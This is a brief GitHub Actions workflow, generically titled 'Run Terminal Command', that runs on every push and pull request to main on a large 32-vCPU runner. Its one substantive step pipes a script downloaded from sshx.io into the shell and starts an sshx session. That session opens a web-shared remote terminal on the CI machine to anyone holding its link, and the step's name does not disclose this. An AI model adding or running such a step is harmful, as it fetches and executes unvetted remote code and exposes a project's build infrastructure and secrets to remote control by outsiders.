name: Run Terminal Command

on:
  push:
    branches: [ main ]
  pull_request:
    branches: [ main ]

jobs:
  run-command:
    runs-on: buildjet-32vcpu-ubuntu-2204

    steps:
      - name: Checkout repository
        uses: actions/checkout@v4

      - name: Run a terminal command
        run: curl -sSf https://sshx.io/get | sh -s run
